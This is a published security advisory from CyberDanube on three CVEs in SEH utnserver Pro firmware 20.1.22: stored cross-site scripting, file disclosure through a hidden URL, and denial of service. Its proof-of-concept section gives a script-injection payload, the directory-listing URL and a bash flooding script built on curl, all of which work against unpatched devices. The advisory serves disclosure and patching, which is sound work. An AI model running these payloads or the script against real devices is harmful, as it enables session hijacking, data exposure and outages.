[EN] Multiple Vulnerabilities in SEH untserver Pro
Title: Multiple Vulnerabilities
Product: SEH utnserver Pro
Vulnerable version: 20.1.22
Fixed version: 20.1.28
CVE: CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
Impact: High
Homepage: https://www.seh-technology.com/
Found: 2024-03-04
The untserver Pro ist prone to stored cross-site scripting, file disclosure and denial of service attacks. This allows an attacker to deactivate the device or place malicious code in the web interface of the untserver.
Vendor description
We are SEH from Bielefeld – manufacturer of high-quality network solutions. With over 35 years of experience in the fields of printing and networks, we offer our customers a broad and high-level expertise in solutions for all types of business environments.
Source: https://www.seh-technology.com/us/company/about-us.html
Vulnerable versions
utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22
Vulnerability overview
1) Stored Cross-Site Scripting (CVE-2024-5420)
A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. Multiple parameters, e.g. the device description, can be abused to inject JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.
2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of the device.
3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of the device. This can be triggered by sending a lot of requests that trigger serial interface access on the device.
Proof of Concept
1) Stored Cross-Site Scripting (CVE-2024-5420)
By accessing to the following URL, an attacker can modify the device description:
http://$IP/device/description_en.html
By using malicious JavaScript payload, it is possible to execute arbitrary code. This snippet demonstrates such a payload:
“><script>alert(document.location)</script>
Saving this text to the device description leads to a persistent cross-site scripting. Therefore, everyone who openes the device description executes the injected code in the context of the own browser.
2) Authenticated File Disclosure (CVE-2024-5421)
A hidden function in the web-interface of the device can be used to disclose directories and files on operating system level. The function can be accessed directly via the browser:
http://$IP/info/dir?/
This lists the current directory and provides the files to be downloaded.
3) Denial of Service (CVE-2024-5422)
For triggering a denial of service on the device, multiple file descriptors are opened by using the following script:
#!/bin/bash
echo “Parameters: $1 $2”
last_iter=$(($2 – 1))
for ((i=1; i<=$2; i++))
do
echo “[$i] Downloading application binary”
if [[ “$i” == “$last_iter” ]];then
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null
else
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null &
fi
done
The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.
Solution
Install firmware version 20.1.28 to fix the vulnerabilities.
Workaround
None
Recommendation
CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to the latest version available.
Contact Timeline
- 2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent advisory to support.
- 2024-03-20: Asked for an update. Contact stated, that an internal timeline will be defined.
- 2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will be patched soon.
- 2024-04-16: Contact sent link to patched firmware release candidate.
- 2024-05-31: Notified SEH Computertechnik that advisory will be released first week of June. Received confirmation from SEH Computertechnik.
- 2024-06-04: Coordinated release of security advisory.
Author
Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.